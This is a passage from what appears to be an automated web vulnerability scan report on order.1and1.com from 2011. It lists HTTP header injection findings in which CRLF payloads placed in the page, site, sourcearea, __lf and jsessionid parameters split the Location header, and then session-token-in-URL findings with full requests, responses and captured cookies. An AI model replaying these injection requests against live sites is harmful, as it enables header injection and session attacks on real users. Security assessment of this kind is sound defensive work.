Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=2e03b
d348ca74978
&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:04 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=d57be
a073224f42f
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkOrigin=Hosting&linkId=ngh&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:37:11 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=6bf4e
357848c4060
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=6bf4e
357848c4060&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=wZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:11 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=switch&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkId=weiter&__frame=_top&sourcearea=29bf0
d43926d593f

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:37:18 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame= HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=ab024%0d%0acfe55b3b16&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:36 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646916771&__frame=&__lf=ab024
cfe55b3b16

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 22:02:43 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=e4fdd%0d%0a682e1dc8167 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=Order-Tariff&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:35 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646915507&__frame=e4fdd
682e1dc8167
&__lf=Order-Tariff
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 22:02:42 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=70f82%0d%0ae7e5d5b7eec&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:48 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646388883&__frame=_top&__lf=70f82
e7e5d5b7eec

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 21:53:55 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:12 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646352788&__frame=_top1fd04
0cd46c6d446

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:53:19 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3. Session token in URL  previous  next
There are 120 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://order.1and1.com/links  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /links

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Found
Date: Sun, 20 Mar 2011 18:53:27 GMT
Server: Apache
Location: http://order.1and1.com/links/?__frame=_top&__lf=Static
Vary: Accept-Encoding
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://order.1and1.com/links/?__frame=_top&amp;
...[SNIP]...

3.2. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632652217
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: variant.configname=2010-04-14; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Set-Cookie: UT=Ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSseJ1dgPTAxLSwxLSsuLCYuJSQ=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.3. http://order.1and1.com/xml/order/AboutUs  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/AboutUs?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.about
Content-Length: 0
Connection: close
Content-Type: text/plain


3.4. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
